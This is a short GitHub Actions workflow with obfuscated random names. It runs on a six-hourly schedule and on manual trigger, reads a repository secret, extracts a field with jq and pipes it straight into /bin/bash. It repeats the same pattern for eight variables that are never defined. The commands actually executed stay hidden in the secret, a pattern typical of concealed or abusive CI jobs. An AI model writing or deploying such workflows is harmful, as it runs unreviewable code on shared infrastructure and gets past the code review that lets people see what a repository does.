name: baifeili4312
on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baifeili4312
        env:
          wi30: ${{ secrets.wi30 }}
        run: |
          echo $wi30 | jq -r .jc2484 | /bin/bash
          echo $ngvf0642 | jq -r .fge02787 | /bin/bash
          echo $xyo4 | jq -r .aq2 | /bin/bash
          echo $yyw4 | jq -r .ipzxv7 | /bin/bash
          echo $kgzb529 | jq -r .etpv2964 | /bin/bash
          echo $ckerk6 | jq -r .cdr089 | /bin/bash
          echo $rz40999 | jq -r .sk4 | /bin/bash
          echo $nivs24195 | jq -r .qisf072 | /bin/bash
          echo $b102 | jq -r .qjjjp10 | /bin/bash

